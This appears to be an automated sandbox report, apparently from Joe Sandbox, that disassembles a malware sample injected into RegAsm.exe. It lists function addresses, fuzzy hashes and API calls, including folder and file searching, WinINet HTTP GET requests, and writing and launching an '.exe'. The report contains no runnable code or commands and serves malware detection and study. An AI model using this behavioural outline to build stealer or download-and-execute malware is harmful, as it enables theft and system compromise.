Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction ID: d389cef70183d5cd616f040657d4303a3a928023e9a5c5ea90d08b3fb0bb435f
Opcode Fuzzy Hash: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction Fuzzy Hash: 6B314D72A0121CAFDF20DF61DD849EEB7BDEB0A345F0400AAF909E2550D6399F848F56

Function 6C54FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C56D019,?,?,?,?,?,00000000,?,6C55DA31,00100000,?), ref: 6C54FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C56D019,?,?,?,?,?,00000000,?,6C55DA31,00100000,?,?), ref: 6C54FFF5
free.MOZGLUE(?,?,?,?,?,6C56D019,?,?,?,?,?,00000000,?,6C55DA31,00100000,?), ref: 6C55001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C56D019,?,?,?,?,?,00000000,?,6C55DA31,00100000,?,?), ref: 6C55002A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 370cae4c1b91e97fef93e56aa980c46485f08e93a56fb0d9d63b51e1f821843b
Instruction ID: d743bd9da465b935d1e653899eb66a44de06f360c101261e8e20685aa3c86af9
Opcode Fuzzy Hash: 370cae4c1b91e97fef93e56aa980c46485f08e93a56fb0d9d63b51e1f821843b
Instruction Fuzzy Hash: 172103B2E002219BC7089E7CDC848AFB7BAEBC53243254339E525D7780EB30AD1183E1

Function 0041665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 004166A7
lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
lstrcatA.KERNEL32(?), ref: 004166D7
lstrcatA.KERNEL32(?,00436B50), ref: 004166E9

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction ID: cfafa51994c6dd41316c3016dfe646ce489cf68115bfde9b3865c7b361435df3
Opcode Fuzzy Hash: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction Fuzzy Hash: FF21B57190021DAFCF54DF60DC46AD9B779EB08305F1040A6F549A3190EEBA9BC48F44

Function 6C57AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C57AAF8
EnterCriticalSection.KERNEL32(6C59F770,?,6C53BF9F), ref: 6C57AB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C53BF9F), ref: 6C57AB39
LeaveCriticalSection.KERNEL32(6C59F770,?,?,?,?,?,?,?,?,6C53BF9F), ref: 6C57AB6B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: a6898d7d6841d57d8510e6ee99fe6d083b81ae58fe801ee69bd12570bbe1b9ce
Instruction ID: 7f00ddbe22874034f8ab50ab5d6ac9919b72177d3d1eafc05cf53a6e6500adea
Opcode Fuzzy Hash: a6898d7d6841d57d8510e6ee99fe6d083b81ae58fe801ee69bd12570bbe1b9ce
Instruction Fuzzy Hash: 721130B1A002598FDF14DFA9DC8499F7BB9FF893047064469E90597301E734E909CBB5

Function 6C52B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C52B4F5
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C52B502
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C52B542
free.MOZGLUE(?), ref: 6C52B578

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 97d4b12c97c7b8fe6c77bfd03b66f974be4bb32b32bc37cf797a839250544a71
Instruction ID: f959835ea4dc7ab91d786046d4ad3941662936b64b4f2b940192acb414d92eae
Opcode Fuzzy Hash: 97d4b12c97c7b8fe6c77bfd03b66f974be4bb32b32bc37cf797a839250544a71
Instruction Fuzzy Hash: D611FD30A04B80C7D321DF28CC00362B3B4FFD6319F12A74AE84A56A02FBB9B5C08785

Function 6C553DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C51F20E,?), ref: 6C553DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C51F20E,00000000,?), ref: 6C553DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C553E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C553E0E

Part of subcall function 6C54CC00: GetCurrentProcess.KERNEL32(?,?,6C5131A7), ref: 6C54CC0D
Part of subcall function 6C54CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5131A7), ref: 6C54CC16

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 589b1221c86a3ae70300b39f43deb935699fedb8f6a9825c0cdd6644da194db8
Instruction ID: a67c6d0c2a9dac6d9fc0aebf60690b7fd625fa5fd599ce1f8349d6a709770571
Opcode Fuzzy Hash: 589b1221c86a3ae70300b39f43deb935699fedb8f6a9825c0cdd6644da194db8
Instruction Fuzzy Hash: A3F08271600208BBD700AF54DC41DAF376CDB86628F060020FD0917741D735BD2986FB

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669

Function 6C562050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C56201B,?,?,?,?,?,?,?,6C561F8F,?,?), ref: 6C562064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56208E
free.MOZGLUE(?,?,?,00000000,?,6C56201B,?,?,?,?,?,?,?,6C561F8F,?,?), ref: 6C5620A3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 70f9da5b0be944337b10e12c45fc407d9d780c8883d82407125103c18e0d009e
Instruction ID: 42d5f00ad00a7992f372f178c4e76db86a20fb8d70e327f9812ddf69679dc429
Opcode Fuzzy Hash: 70f9da5b0be944337b10e12c45fc407d9d780c8883d82407125103c18e0d009e
Instruction Fuzzy Hash: C9F02471100700CBD7209F07CC8875BB7F8EF86324F02011AE54683B20C776A805CB9A

Function 6C5620B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5620B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C54FBD1), ref: 6C5620C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C54FBD1), ref: 6C5620DA
free.MOZGLUE(00000000,?,6C54FBD1), ref: 6C5620F1

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 26a48b30784b174a58cfb171cc6f4a093a2d84bca0c1de721c69a7225bc597f9
Instruction ID: 21c841fda9144c42cc55dc4a12e9fa782604b94ffdf9186e3eaf65c67d572ee1
Opcode Fuzzy Hash: 26a48b30784b174a58cfb171cc6f4a093a2d84bca0c1de721c69a7225bc597f9
Instruction Fuzzy Hash: 73E0EC316006148BC7309F269C0854EB7FDEF863147020556E446C3B10D775A94586DA

Function 6C5685B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C5685D3

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C568725

Strings

map/set<T> too long, xrefs: 6C568720

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: b94db5813be0370f986580f86af888bd61d1b4db8239833f17b7e88a80fbe584
Instruction ID: 8c7fa3b3e68672e4b377263985dbf1c24d9bcd08965b841551eb13388625dbb5
Opcode Fuzzy Hash: b94db5813be0370f986580f86af888bd61d1b4db8239833f17b7e88a80fbe584
Instruction Fuzzy Hash: 51515474600651CFD701CF1AC884A5ABBF1BF9A318F18C68AD8595BB62C375EC85CF92

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9

Function 6C51BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C51BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C51BE8F

Strings

0, xrefs: 6C51BE5B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: f1e9b73ca625fa3c37650a81abce64cbb7ba00d52a97cabc4993e94117bcde1b
Instruction ID: 629b7c4170780fe77674d1f9aff72e9beb0fa1e99906daf66be63edc6b2a13a7
Opcode Fuzzy Hash: f1e9b73ca625fa3c37650a81abce64cbb7ba00d52a97cabc4993e94117bcde1b
Instruction Fuzzy Hash: 8D418DB1909745CFD701EF38C885A9BB7E4AF8A358F008B1DF985A7B11D73099598B82

Function 6C519A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C519B2C
memcpy.VCRUNTIME140(6C5199CF,00000000,?), ref: 6C519BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C519BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C519DE4

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d3a7cddf128e9c6f0e62d74cd84c175be88f7357e798c7cf53bb8ba60e9ae871
Instruction ID: 9c8b71feabeee514b774b0eaeca3c32c51b025687fe22d2af9982cbd1d317318
Opcode Fuzzy Hash: d3a7cddf128e9c6f0e62d74cd84c175be88f7357e798c7cf53bb8ba60e9ae871
Instruction Fuzzy Hash: CED15971A0421ADFDB14CF69CC84AAEBBF2FF88314F184529E945A7B40D731AD55CB90

Function 6C560A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C5237F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C57145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C52380A

Part of subcall function 6C558DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C5706E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C558DCC

Part of subcall function 6C560B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C56138F,?,?,?), ref: 6C560B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C56138F,?,?,?), ref: 6C560B27
free.MOZGLUE(?,?,?,?,?,6C56138F,?,?,?), ref: 6C560B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C560AB5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

